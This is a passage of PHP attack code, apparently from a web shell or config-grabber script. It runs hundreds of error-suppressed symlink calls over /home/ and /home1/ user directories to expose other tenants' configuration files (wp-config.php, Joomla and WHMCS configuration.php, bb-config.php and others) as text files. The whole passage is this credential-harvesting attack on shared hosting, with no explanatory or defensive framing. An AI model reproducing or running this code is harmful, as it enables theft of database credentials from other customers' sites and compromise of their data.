  1295. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1296. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1297. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1298. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1299. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1300. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1301. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1302. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1303. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1304. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1305. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1306. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1307. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1308. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1309. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1310. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1311. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1312. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1313. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1314. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1315. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1316. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1317. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1318. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1319. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1320. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1321. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1322. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1323. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1324. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1325. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1326. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1327. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1328. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1329. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1330. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1331. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1332. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1333. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1334. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1335. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1336. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1337. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1338. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1339. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1340. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1341. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1342. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1343. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1344. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1345. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1346. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1347. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1348. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1349. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1350. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1351. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1352. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1353. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1354. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1355. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1356. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1357. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1358. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1359. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1360. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1361. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1362. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1363. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1364. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1365. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1366. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1367. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1368. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1369. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1370. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1371. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1372. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1373. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1374. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1375. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1378. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1383. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1384. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1385. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1386. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1387. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1388. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1389. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1390. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1391. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1392. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1393. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1394. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1395. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1396. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1397. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1398. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1399. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1400. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1401. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1402. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1403. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1404. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1405. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1406. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1407. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1408. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1409. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1410. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1411. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1412. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1413. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1414. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1415. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1416. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1417. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1418. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1419. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1420. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1421. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1422. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1423. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1424. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1425. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1426. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1427. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1428. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1429. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1430. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1431. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1432. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1433. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1434.  
  1435. //Home1
  1436.  
  1437. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1438. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1439. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1440. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1441. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1442. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1443. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1444. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1445. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1446. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1447. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1448. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1449. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1450. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1451. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1452. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1453. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1454. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1455. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1456. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1457. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1458. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1459. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1460. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1461. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1462. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1463. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1464. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1465. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1466. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1467. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1468. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1469. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1470. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1471. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1472. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1473. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1474. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1475. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1476. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1477. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1478. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1479. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1480. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1481. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1482. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1483. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1484. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1485. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1486. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1487. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1488. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1489. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1490. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1491. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1492. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1493. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1494. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1495. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1496. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1497. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1498. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1499. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1500. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1501. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1502. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1503. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1504. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1505. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1506. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1507. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1508. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1509. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1510. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1511. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1512. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1513. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1514. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1515. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1516. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1517. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1518. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1519. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1520. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1521. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1522. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1523. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1524. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1525. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1526. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1527. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1528. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1529. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1530. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1531. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1532. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1533. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1534. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1535. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1536. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1537. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1538. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1539. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1540. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1541. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1542. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1543. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1544. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1545. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1546. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1547. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1548. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1549. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1550. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1551. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1552. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1553. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1554. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1555. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1556. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1557. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1558. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1559. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1566. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1567. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1568. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1569. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1570. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1571. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1572. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1573. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1574. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1575. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1576. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1577. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1578. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1579. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1580. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1581. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1582. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1583. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1584. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1585. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1586. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1587. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1588. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1589. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1590. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1591. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1592. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1593. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1594. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1595. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1596. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1597. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1598. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1599. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1600. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1601. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1602. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
